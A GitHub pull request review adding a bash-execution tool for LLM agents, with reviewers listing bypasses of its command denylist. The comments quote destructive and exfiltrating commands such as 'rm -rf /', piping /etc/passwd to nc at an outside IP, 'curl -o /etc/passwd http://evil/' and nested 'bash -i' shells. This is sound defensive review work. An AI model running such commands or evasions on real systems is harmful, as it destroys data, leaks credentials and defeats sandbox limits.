Skip to content

feat: add bash tool #1056

Open
akihikokuroda wants to merge 13 commits into
generative-computing:mainfrom
akihikokuroda:shell
Open

feat: add bash tool #1056
akihikokuroda wants to merge 13 commits into
generative-computing:mainfrom
akihikokuroda:shell

Conversation

@akihikokuroda
Copy link
Copy Markdown
Member

@akihikokuroda akihikokuroda commented May 11, 2026

Tool PR

Use this template when adding or modifying components in mellea/stdlib/tools/.

Description

This PR adds bash tool. It has a fixed set configuration. The UX configuration will be in a separate PR.

Implementation Checklist

Protocol Compliance

  • Ensure compatibility with existing backends and providers
    • For most tools being added as functions, this means that calling convert_function_to_tool works

Integration

  • Tool exported in mellea/stdlib/tools/__init__.py or, if you are adding a library of components, from your sub-module

Testing

  • Tests added to tests/stdlib/tools/
  • New code has 100% coverage
  • Ensure existing tests and github automation passes (a maintainer will kick off the github automation when the rest of the PR is populated)

Attribution

  • AI coding assistants used: claudecode

@akihikokuroda akihikokuroda requested a review from a team as a code owner May 11, 2026 00:21
@github-actions github-actions Bot added the enhancement New feature or request label May 11, 2026
@github-actions
Copy link
Copy Markdown
Contributor

The PR description has been updated. Please fill out the template for your PR to be reviewed.

Copy link
Copy Markdown
Contributor

@planetf1 planetf1 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the PR — the three-tier environment design (Static/Unsafe/LLMSandbox) follows code_interpreter cleanly, and reusing ExecutionResult is the right call.

Two security concerns need resolving before merge, plus a few smaller issues below.


UnsafeBashEnvironment validates argv but executes with shell=True

The safety checks parse the command with shlex.split() and inspect argv[0], then execute the original string with subprocess.run(command, shell=True, ...) (line 430). The shell processes the raw string, not the tokenised argv, so shell metacharacters bypass every check:

local_bash_executor("echo hi; rm -rf /")
# shlex.split → ['echo', 'hi;', 'sudo', 'rm', '-rf', '/']
# argv[0] = 'echo' — passes all checks
# shell runs: echo hi; rm -rf /   ← both commands execute

Same with redirects, pipes, and subshell substitution:

local_bash_executor("echo foo > /etc/passwd")             # redirect, not a write_command
local_bash_executor("echo $(id)")                         # subshell, not in argv
local_bash_executor("cat /etc/passwd | nc x.x.x.x 4444") # exfil

The fix is to execute argv with shell=False. That way what you check is exactly what runs.


bash -c "..." isn't blocked

bash, sh, zsh etc. are in DANGEROUS_COMMANDS but only blocked when -i/--interactive/-l/-login appears. bash -c "sudo rm -rf /" passes:

shlex.split('bash -c "sudo rm -rf /"') → ['bash', '-c', 'sudo rm -rf /']
any(arg in ('-i', '--interactive', '-l', '-login') for arg in argv)  # → False

Any LLM-generated command can dodge the whole denylist with a bash -c "..." wrapper. test_safe_shell_commands_allowed intentionally locks this in as expected behaviour, so it would need updating too.

If you go the shell=False route above, you'd also want to block -c (and script-file arguments) on shell interpreters.


Other things worth fixing in the same pass:

BashEnvironment.__init__ accepts allowed_paths and stores it on self, but nothing in any of the three environment classes reads self.allowed_paths. Callers who pass it expecting path enforcement get nothing. Either wire it into the checks or drop the parameter.

LLMSandboxBashEnvironment validates working_dir statically but doesn't pass it to SandboxSession (line 552 — no working_dir arg). The Docker container runs with its own default cwd. bash_executor(cmd, working_dir="/project") silently ignores the restriction.

except subprocess.TimeoutExpired at line 569 is inside the llm-sandbox session block. llm-sandbox isn't subprocess, so this handler likely never fires — timeouts fall through to except Exception with a generic message. The interpreter.py pattern just uses except Exception as e and that's cleaner here.

The parse/validate preamble (shlex.split → empty check → three validator calls) is copy-pasted into all three execute() methods verbatim. Once the security issues are fixed, extracting it to BashEnvironment._validate() would make future changes a one-place edit.

docs/examples/tools/shell_example.py line 1: # pytest: unit, qualitative → should be # pytest: e2e, qualitative. unit is auto-applied by conftest and shouldn't be written explicitly; this example runs real subprocesses so e2e is the right tier.

Three unused imports in shell.py: tempfile, dataclass, Any — ruff will flag these as F401.

Comment thread mellea/stdlib/tools/shell.py
@planetf1
Copy link
Copy Markdown
Contributor

planetf1 commented May 11, 2026

The Docker sandbox path (LLMSandboxBashEnvironment) is the right approach for production use — container isolation is a real boundary. The concern is with UnsafeBashEnvironment and the safety checks around it.

The checks (lines 91–124) parse the command with shlex.split() to inspect argv[0] and flags, but execution at line 430 passes the raw string to /bin/sh -c via shell=True. The shell re-parses everything, including metacharacters that shlex.split never touches. All four of these pass every check:

```
echo hi && sudo cat /etc/shadow # argv[0] = "echo"
true; rm -rf /home # argv[0] = "true"
bash -c 'sudo id' # bash is in DANGEROUS_COMMANDS, but only -i/-l is blocked; -c is not
python3 -c "import os; os.system('rm -rf /')" # python3 is not in the denylist
```

The Python docs cover this in the subprocess security considerations: pre-processing a string before passing it to a shell does not make it safe. The shell is the parser that matters.

Two ways to fix this. Drop shell=True and pass shlex.split(command) as the args list — the denylist then governs what actually runs, at the cost of pipes, globs, and redirects. Or remove the denylist from UnsafeBashEnvironment, rename the public function (something like unsafe_local_bash_executor), and document that it is for trusted, developer-controlled use only. The Docker sandbox already handles the untrusted case.

what direction would you plan to take? it feels like an unsafe bash execution is rather unsafe (though many tools do offer something). I wonder if it should not be allowed by default, and we need to be very clear on any limitations/security impact.

@planetf1
Copy link
Copy Markdown
Contributor

Checking this against #1024 — the capability-UX integration (allow once / allow always, policy wiring through the harness) doesn't appear to be included. Intentional scope reduction, or planned as a follow-up?

Copy link
Copy Markdown
Contributor

@ajbozarth ajbozarth left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Some feedback from Claude. Also note Nigel's follow-up comment on UnsafeBashEnvironment still stands.

Comment thread docs/examples/tools/shell_example.py Outdated
Comment thread mellea/stdlib/tools/shell.py
Comment thread mellea/stdlib/tools/shell.py
Comment thread mellea/stdlib/tools/shell.py Outdated
Comment thread mellea/stdlib/tools/__init__.py Outdated
Comment thread mellea/stdlib/tools/shell.py
Comment thread test/stdlib/tools/test_shell.py Outdated
Comment thread test/stdlib/tools/test_shell.py
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
@akihikokuroda
Copy link
Copy Markdown
Member Author

Checking this against #1024 — the capability-UX integration (allow once / allow always, policy wiring through the harness) doesn't appear to be included. Intentional scope reduction, or planned as a follow-up?Checking this against #1024 — the capability-UX integration (allow once / allow always, policy wiring through the harness) doesn't appear to be included. Intentional scope reduction, or planned as a follow-up?

I'll address it as a follow-up.

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Copy link
Copy Markdown
Contributor

@ajbozarth ajbozarth left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

All major concerns from the prior round are addressed. A few non-blocking follow-ups inline.

Comment thread mellea/stdlib/tools/shell.py Outdated
Comment thread mellea/stdlib/tools/shell.py Outdated
Comment thread mellea/stdlib/tools/shell.py
Comment thread test/stdlib/tools/test_shell.py Outdated
Comment thread docs/examples/tools/shell_example.py Outdated
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
@akihikokuroda akihikokuroda requested a review from ajbozarth May 12, 2026 19:52
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Comment thread mellea/stdlib/tools/shell.py
Comment thread docs/examples/tools/shell_example.py Outdated
Comment thread docs/examples/tools/shell_example.py Outdated
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
@akihikokuroda akihikokuroda requested a review from ajbozarth May 13, 2026 01:02
Comment thread docs/examples/tools/shell_example.py Outdated
Comment thread docs/examples/tools/shell_example.py Outdated
@planetf1
Copy link
Copy Markdown
Contributor

LGTM from my side once Angelo's inline comments are addressed. Thanks for filing the follow-up issues too.

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
@akihikokuroda akihikokuroda requested a review from ajbozarth May 13, 2026 14:42
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
@ajbozarth
Copy link
Copy Markdown
Contributor

ajbozarth commented May 13, 2026

Updates look good, but I still don't get a successful result in the llm example:

=== Example 3: LLM-Generated Bash Commands with Forced Tool Use ===
  0%|                                                                                                                                                                                                                    | 0/2 [00:00<?, ?it/s]=== 09:46:59-INFO ======
Tools for call: dict_keys(['bash_executor'])
=== 09:46:59-INFO ======
SUCCESS
  0%|                                                                                                                                                                                                                    | 0/2 [00:00<?, ?it/s]
LLM generated bash command:
  find . -type f -iname '*.py'

Execution result:
  Success: False
  Skipped: True
  Skip reason: Sandbox execution error: Error while fetching server API version: ('Connection aborted.', FileNotFoundError(2, 'No such file or directory'))
  Output: None

for comparison, before the last commit this was the result:

=== Example 3: LLM-Generated Bash Commands with Forced Tool Use ===
  0%|                                                                                             | 0/2 [00:00<?, ?it/s]=== 20:44:24-INFO ======
Tools for call: dict_keys(['unsafe_local_bash_executor'])
=== 20:44:24-INFO ======
SUCCESS
  0%|                                                                                             | 0/2 [00:00<?, ?it/s]
LLM generated bash command:
  ls *.py

=== 20:44:24-WARNING ======
Using unsafe_local_bash_executor: no isolation. Use bash_executor() for LLM-generated code.
Execution result:
  Success: False
  Skipped: False
  Output: 
  Error: ls: *.py: No such file or directory

@akihikokuroda
Copy link
Copy Markdown
Member Author

akihikokuroda commented May 13, 2026

Here is my case. LLM generates command with "find". it doesn't find any file anyway but it doesn't say "error". :-)

I don't think that this example is very good but enough.

=== 11:32:24-WARNING ======
Using unsafe_local_bash_executor: no isolation. Use bash_executor() for LLM-generated code.
Tool invocation result:
  Success: True
  Output: /Users/akihikokuroda/development/repositories/generative-computing/mellea

=== 11:32:24-INFO ======
Starting Mellea session: backend=ollama, model=granite4.1:3b, context=SimpleContext
=== Example 3: LLM-Generated Bash Commands with Forced Tool Use ===
  0%|                                                                                                                            | 0/2 [00:00<?, ?it/s]=== 11:32:24-INFO ======
Tools for call: dict_keys(['bash_executor'])
=== 11:32:26-INFO ======
SUCCESS
  0%|                                                                                                                            | 0/2 [00:01<?, ?it/s]
LLM generated bash command:
  find . -name "*.py"

Execution result:
  Success: True
  Skipped: False
  Output: ./04c43b39e616410d828490aa31e4f20d.py

=== Example 3: Working Directory Restriction ===
Working directory: /var/folders/kl/cljphvzd64qgtl2sqnh30fs00000gn/T/tmpey3c8_6o
=== 11:32:43-WARNING ======
Using unsafe_local_bash_executor: no isolation. Use bash_executor() for LLM-generated code.
Command: touch myfile.txt (relative path, executed in /var/folders/kl/cljphvzd64qgtl2sqnh30fs00000gn/T/tmpey3c8_6o)
Success: True

✓ File created at: /var/folders/kl/cljphvzd64qgtl2sqnh30fs00000gn/T/tmpey3c8_6o/myfile.txt

=== 11:32:43-WARNING ======
Using unsafe_local_bash_executor: no isolation. Use bash_executor() for LLM-generated code.
Command: cat myfile.txt
Output: 

Copy link
Copy Markdown
Contributor

@ajbozarth ajbozarth left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

FYI the example failed for me until I set DOCKER_HOST. The Python docker SDK (used by llm-sandbox) doesn't read Docker CLI contexts and defaults to /var/run/docker.sock. That works on Docker Desktop (which symlinks the socket there) but not on colima, podman, or rootless setups, where users hit a cryptic FileNotFoundError(2, 'No such file or directory') with no pointer to the real fix.

Not blocking, but might be worth a note in the example docstring or a clearer skip-reason.

@akihikokuroda
Copy link
Copy Markdown
Member Author

FYI the example failed for me until I set DOCKER_HOST. The Python docker SDK (used by llm-sandbox) doesn't read Docker CLI contexts and defaults to /var/run/docker.sock. That works on Docker Desktop (which symlinks the socket there) but not on colima, podman, or rootless setups, where users hit a cryptic FileNotFoundError(2, 'No such file or directory') with no pointer to the real fix.

Not blocking, but might be worth a note in the example docstring or a clearer skip-reason.

@ajbozarth It seems out of scope for this example commenting about docker setup.

@akihikokuroda
Copy link
Copy Markdown
Member Author

@planetf1 Would you approve this?

Copy link
Copy Markdown
Contributor

@planetf1 planetf1 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the PR, Aki! The shlex.split/shell=False foundation is the right approach, and the environment abstraction is clean. I do have three security findings that need addressing before merge, plus a few correctness issues.

BLOCKERs (must fix before merge)

  • env-chain bypass: env -i sudo whoami and env rm -rf /tmp/test both pass through the denylist
  • _check_working_dir_restriction is fail-open: an unresolvable working_dir silently grants access to all paths
  • /private/var in DANGEROUS_PATHS blocks Python's standard temp directories on macOS

Warnings

  • Shell operator substring check produces false positives (grep a&&b file.txt is blocked)
  • Several normal operations are incorrectly blocked: git config -f, git clean --dry-run, cp -r, make -f
  • Double truncation marker in _LocalBashEnvironment.execute()
  • repr() in the sandbox Python wrapper breaks if any argv element is a Path object

Suggestion

  • Truncation test oracle is always true and doesn't actually validate truncation

Details in the inline comments.

Comment thread mellea/stdlib/tools/shell.py
Comment thread mellea/stdlib/tools/shell.py Outdated
Comment thread mellea/stdlib/tools/shell.py Outdated
Comment thread mellea/stdlib/tools/shell.py Outdated
Comment thread mellea/stdlib/tools/shell.py Outdated
Comment thread mellea/stdlib/tools/shell.py
Comment thread mellea/stdlib/tools/shell.py Outdated
Comment thread test/stdlib/tools/test_shell.py Outdated
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
@akihikokuroda akihikokuroda requested a review from planetf1 May 14, 2026 16:10
Copy link
Copy Markdown
Contributor

@ajbozarth ajbozarth left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Did a quick re-review after you addressed Nigels review about and my approval still stands

Copy link
Copy Markdown
Contributor

@planetf1 planetf1 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Three more bypasses surfaced when I traced the validator against the head. The first complements Nigel's flag_value_flags BLOCKER (the issue is broader than the env-chain framing). The other two are independent: the path-safety check has a wide gate (wrapper prefixes plus uncovered write commands like chmod/curl/dd), and safe-wrapper context lets nested shells through with -i/-c flags. Two smaller pairings with existing threads at the bottom (git --force long-forms; pip install hint).

# Skip if this argument is the value for a preceding flag (space-separated)
# E.g., in "timeout -t 10 sudo", skip "10" (it's the value for -t)
# But don't skip "sudo" when the flag uses = notation (e.g., --kill-after=1)
if i > 1 and argv[i - 1] in flag_value_flags:
Copy link
Copy Markdown
Contributor

@planetf1 planetf1 May 18, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Flagging that this is wider than env -i sudo: the skip on this line fires for any command whose previous token is in flag_value_flags. Tried these against the head, all pass:

  • ssh -t sudo whoami
  • git -c sudo whoami
  • ls -d sudo whoami
  • find -p sudo something

Worth knowing for the fix — scoping the skip to cmd in SAFE_WRAPPER_COMMANDS won't fully close it. argv[0] is ssh/git/ls, none of which hit the DANGEROUS_COMMANDS check on cmd, so sudo slides through with no further inspection. Probably easiest to drop the skip, or scope it to wrappers and use the real value-taking flags each wrapper consumes (e.g. env -u VAL, env -S VAL).


Tracked in #1087 alongside the env-chain case above.

A tuple of (has_dangerous_paths, reason_message).
"""
write_commands = {"rm", "touch", "cp", "mv", "mkdir", "mkfifo", "mknod", "tee"}
if not argv or argv[0].split("/")[-1] not in write_commands:
Copy link
Copy Markdown
Contributor

@planetf1 planetf1 May 18, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The early-return here (and at L411 in _check_working_dir_restriction) means most write paths never get checked. The bash_executor docstring says it refuses writes to system paths, but I tried these against the head and they all pass:

env touch /etc/passwd
nohup rm /etc/passwd
timeout 10 cp /etc/foo /etc/bar
chmod 777 /etc/shadow
chown root /etc/passwd
install -m 644 src /etc/foo
ln -sf /etc/shadow /tmp/x
truncate -s 0 /etc/passwd
curl -o /etc/passwd http://evil/
wget -O /etc/passwd http://evil/

Two ways to handle, depending on what you want the denylist to promise:

  1. Walk past a SAFE_WRAPPER_COMMANDS prefix and re-check the effective command, plus add chmod, chown, dd (with of= parsing), install, ln, truncate, wget, curl to write_commands.
  2. Reframe the docstring — position the denylist as a coarse filter and treat Docker isolation in LLMSandboxBashEnvironment as the real write boundary. Cleaner for bash_executor; unsafe_local_bash_executor would still need option 1.

Tracked in #1088. Either resolution path (extend write_commands or reframe the docstring) is fine — issue captures both.

# "env -i sudo" or "timeout -t 10 sudo". Without the wrapper allowlist,
# these would pass validation despite being dangerous.
if arg_cmd in DANGEROUS_COMMANDS:
if cmd not in SAFE_WRAPPER_COMMANDS or arg_cmd not in (
Copy link
Copy Markdown
Contributor

@planetf1 planetf1 May 18, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Different from the env -i sudo thread — once a shell is allowed as a nested arg here, the interactive-shell check at L244 never runs because it keys on cmd (which is the wrapper, not the shell). Tried these:

timeout 10 bash -i           # interactive shell spawned
env bash -i
nohup bash -i
timeout 10 bash -c 'echo x'  # interpreter-indirection bypass too

Slicing argv[i:] here and re-applying the -i/-l/-c reject on the slice would cover it.


Tracked in #1087 (same denylist-coverage class as the flag_value_flags work).

has_destructive_op = False

# git push --force: check for exact tokens (not substrings)
if "push" in argv and any(arg == "--force" or arg == "-f" for arg in argv):
Copy link
Copy Markdown
Contributor

@planetf1 planetf1 May 18, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pairing with the false-positives thread — there are also false negatives in the --force* family. Tried these:

git push --force-with-lease
git push --force-if-includes
git clean --force            # long form excluded by the `not arg.startswith("--")` guard at L274

One option:

# L256
if "push" in argv and any(arg == "-f" or arg.startswith("--force") for arg in argv):

# L268
if arg in ("-f", "-d", "-fd", "-df", "--force", "--directory"):

Tracked in #1087 (small denylist fix; folded in with the rest of the validator work).

stdout=None,
stderr=None,
skipped=True,
skip_message="llm-sandbox not installed. Install with: pip install 'mellea[sandbox]'",
Copy link
Copy Markdown
Contributor

@planetf1 planetf1 May 18, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

AGENTS.md mandates uv, so the user-facing hint should match.

Suggested change
skip_message="llm-sandbox not installed. Install with: pip install 'mellea[sandbox]'",
skip_message="llm-sandbox not installed. Install with: uv add 'mellea[sandbox]'",

interpreter.py:1019 has the same string — probably a follow-up rather than this PR.


Tracked in #1087. Worth doing alongside the matching string in interpreter.py:1019 so the project's install hints become consistent.

Copy link
Copy Markdown
Contributor

@planetf1 planetf1 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Approving. The architecture is sound — three-tier env, shlex.split + shell=False, Docker isolation as the real boundary for bash_executor. Useful new capability, ready to ship.

Two open gaps in the validator surface area, both filed as sub-issues of #1024:

  • #1087 — denylist bypass classes (broadens the env-chain follow-up to cover ssh -t sudo etc., safe-wrapper nested shells like timeout bash -i, git --force* long forms, and the pip installuv hint)
  • #1088 — path-safety gate too narrow (write_commands whitelist + wrapper bypass; covers the docstring honesty work)

Aki, happy for these to be follow-up PRs or for you to fold any subset into this PR — your call. The bigger lift in #1088 is the framing decision (extend write_commands vs. reframe the docstring as coarse filter + Docker as the real boundary); the smaller items in #1087 are a few lines if you'd rather batch them in here.

Thanks for the patience through the review cycles.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

enhancement New feature or request

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants